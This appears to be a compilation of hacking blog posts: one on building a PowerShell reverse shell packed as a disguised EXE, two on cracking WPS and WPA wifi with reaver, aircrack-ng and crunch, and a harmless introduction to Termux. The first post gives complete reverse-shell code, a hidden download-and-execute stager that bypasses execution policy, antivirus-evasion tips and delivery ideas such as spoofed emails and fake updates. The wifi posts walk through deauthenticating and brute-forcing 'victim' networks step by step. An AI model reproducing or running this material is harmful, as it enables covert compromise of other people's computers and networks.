Hacking windows with PowerShell

Today we gonna do some sniki biki style hacking with PowerShell.

I assume you have Kali Linux installed and running.
First we need to install wine so we can execute EXE. Run:
sudo apt install wine64

Once installed, download PS2EXE, you can get it here: https://gallery.technet.microsoft.com/scriptcenter/PS2EXE-GUI-Convert-e7cb69d5/file/172772/12/PS2EXE-GUI.zip
In this post we gonna use a PS script provided by staaldraad.

Lets start creating our powersehll script/payload.
First of all we need to get the computers IP address. We will do it with a oneliner.
$IPV4=(Test-Connection -ComputerName $env:computername -count 1).ipv4address.IPAddressToString

Running this you will get your IP address of the current computer, so if an victim runs it, we will get his IP address.
Once we get the address we can use the script provided by staaldraad. The whole script would look like this:

## getting the IPv4 Address
$IPV4=(Test-Connection -ComputerName $env:computername -count 1).ipv4address.IPAddressToString
## Setting up listener
$socket = new-object System.Net.Sockets.TcpClient($IPV4, 8080);
if($socket -eq $null){exit 1}
$stream = $socket.GetStream();
$writer = new-object System.IO.StreamWriter($stream);
$buffer = new-object System.Byte[] 1024;
$encoding = new-object System.Text.AsciiEncoding;
do{
$writer.Write("> ");
$writer.Flush();
$read = $null;
while($stream.DataAvailable -or ($read = $stream.Read($buffer, 0, 1024)) -eq $null){}
$out = $encoding.GetString($buffer, 0, $read).Replace("`r`n","").Replace("`n","");
if(!$out.equals("exit")){
$out = $out.split(' ')
$res = [string](&$out[0] $out[1..$out.length]);
if($res -ne $null){ $writer.WriteLine($res)}
}
}While (!$out.equals("exit"))
$writer.close();$socket.close();

Let’s call the script ps_8080.ps1
PS: You can use a online Virus scan tool like https://metadefender.opswat.com/ to see if it will pass or be detected by AV. In our example only ESET has detected it as a trojan. Also please don’t upload to virus total!
Now we need our victim to download the script. So my though was an addition script again.
I would recomend to run a http server like apache or nginx, where you could easily store the file. Or you can use portforwarding on your router and run the server on your machine, but I wont describe how to do that in this post. Alternatively you can upload it in the cloud and share the file with someone.

Let’s assume we have an https server on the internet. The script would look like this:

$url = "http://YOURIPADDRESS/ps_8080.ps1"
$output = "%TMP%\ps_8080.ps1"
Invoke-WebRequest -Uri $url -OutFile $output
powershell -noprofile -windowstyle hidden -noninteractive –executionpolicy Baypass –noExit -command .\$output

I’ll call the script download+execute.ps1
So now we have a download and execute script. Now I would like to convert it to an EXE. For that we going to use our previous downloaded PS2EXE. We can even choose an icon to look less suspicious. Also let’s supress the output and error output, just check the 2 checkboxes.

All is set up, just press compile now.
Now once downloaded and executed, there will be an open listener on port 8080.

For that you can use metasploit or netcat to connect to to the listener. I will not show how that works in this post, but in a later one.
There are different ways how you can deploy the script/EXE, spoof emails, hijack downloads, hijack browsers and pretend to be an update and many more.

Hacking WPS

Today we will try to break in a access point using reaver.
Do only use this knowledge for educational use and only on your own network!
Reaver is an WPS cracking tool.

I assume you have kali installed and have a monitor mode compatible dongle. I do also assume you have monitor mode activated on the desired interface.

Lets download reaver first, run apt-get install reaver.

Reaver provides a tool for victim scans, it’s called wash.
Run wash
The output should be:
BSSID Ch dBm WPS Lck Vendor ESSID
Important things here are BSSID and CH.
Once you found a victim note or copy the BSSID and CH somewhere.
Now its time for the action!
Run:
reaver -i {monitor interface} -b {BSSID of router} -c {router channel}

The output should be the cracking attempts and if it worked or failed.
We can use more advanced parameters for reaver to be more precise what we want.
Run:
reaver -i {monitor interface} -b {BSSID of router} -c {router channel} -vvv -K 1 -f-L -N -d 15 -T .5
I will explain what those parameters mean.
-vvv be verbose
-K run pixiedust attack
-f disable channel hopping
-L ignore locked state of the target
-N Do not send NACK messages when out of order packets are received
-d delay
-T timeout period

Now all you have to do is to wait until its successfull.

WPA Hacking with Kali

Todays topic is for the hackermans among us, or becoming hackermans. The tutorial will be about WALN hacking and brute-forcing!

This Tutorial is only for educational purposes and should only be used at your own network.

Things you need

A laptop/pc or USB-Stick with Kali Linux installed on it. An Wireless adapter with monitoring mode, like this or this. There are also more of them but for this tutorial I will leave it with those two.

I assume you have kali installed on your computer or on an USB. For USB, you can easily do it with LiLI. Just download the distribution here (Choose the right architecture!) and the configuration is straight forward. But be careful not to incidentally delete your system partition.

 

After the login start a prompt and type:

For Alfa Network AWUS036NHA:

apt-get update && apt-get install firmware-atheros

For Alfa AWUS036ACH:

apt-get update && apt-get install realtek-rtl88xxau-dkms

So now the firmware for the WiFi dongle is installed and is ready to use.

Next, lets install some tools we will be using, depending on your Kali (full or minimal) the tools may be already installed. To install the tools type:

apt-get install aircrack-ng cowparty crunch

 

aircrack-ng and cowparty is for WIFI brute-forcing, crunch for password generation.

 

Let’s start with the Basics

Enabling Monitor Mode on your dongle. Plug It in, wait until the LED blinks and enter the following commands:

airmon-ng start wlan0

This will create a wlan0mon as an interface.

It may be that the dongle is not wlan0, just run ip addr and localize your dongle.

 

Now let’s search for a victim. To scan for victims run airodump-ng wlan0mon.

Lets assume we have a network with the following information: ESSID: bigbear; BSSID: 00:14:6C:7A:41:8; CH:9
The interesting things here are the CH, BSSID, ESSID.

Now you have a victim take a note of the entry’s and run airodump-ng wlan0mon -c {CH} --bssid {BSSID} –w {outputFileName}

So for bigbear it would be:

airodump-ng wlan0mon –c 9 --bssid 00:14:6C:7A:41:81 –w wpastream

now the output will be saved in wpastream.cap in the directory you are right now.

 

Next we need to Deauthenticate some users to get the handshake. Open a new prompt and type aireplay-ng wlan0mon –deauth 3 –a {BSSID}

-3 means deauth all.

For bigbear it would be:

aireplay-ng wlan0mon –deauth 3 –a 00:14:6C:7A:41:81

 

Then watch the first prompt at the upper right corner for [WPA handshake]

It will remain empty until you finally caught a handshake. If you caught one press ctrl + C to to stop capturing.

 

Once you caught a handshake, run wpaclean \path\to\hanshakeFile to clean the handshake file.

In our case i would run: wpaclean wpastream.cap

So we are now ready to go to crack the password. Depending on the password complexity it may take from minutes to hours to crack one.

There are two way of cracking it. The first is with a wordlist the second is hashcracking. In this tutorial I will use a brute-force.

We will use a crunch generated list, just run:

crunch 8 8 | aircrack-ng -e [ESSID] -w – [file path to the .cap file]

the first 8 mean min password length and the second maximum.

For bigbear it will be:

crunch 8 8 | aircrack-ng -e bigbear -w – wpastream.cap

same goes for cowparty:

crunch 8 8 | cowparty –f -- -r wpastream.cap –s bigbear

 

Termux the allrounder

Today’s topic will be one of my favourite android apps, Termux.

Termux is an Android terminal emulator and Linux environment application that works directly with no rooting or setup required. A minimal base system is installed automatically, additional packages are also available. The difference to other terminal emulators is its own package repository with huge set of various utilities.

Termux also offers different shells, like:

  • BASH
  • FISH
  • IPython
  • TCSH
  • Zonsh
  • ZSH

The default shell is BASH.

Difference between Termux and other Linux systems

The biggest difference is that Termux does not follow Filesystem Hirarchy Standart. This means you won’t find directories like /bin, /etc, /usr, /tmp and others at usual location.

 

The basics

Let’s get started. First of all lets run:

termux-setup-storage

So we can access the phones internal storage. It is useful because you can move data from a to b if you need it.

Next thing are buttons. You miss the esc, ctrl, tab buttons, no problem. Press and hold the volume down button and press “q”. The buttons have just appeared, right.

Want to edit files? Then lets go download an editor, for example the beginner friendly nano. You can download packages by running:

pkg install PackageName or search with pkg search

an alternative way of installing them is using APT the well-known package manager from other Linux systems:

apt install PackageName

So we run:

pkg install nano

or

apt install nano

Now let’s edit some documents. Now run

nano documentname

A tip, you can navigate in the document by pressing the volume up button and w, a, s, d. Just like on a computer.

Source of the image and the infomartion Termux Wiki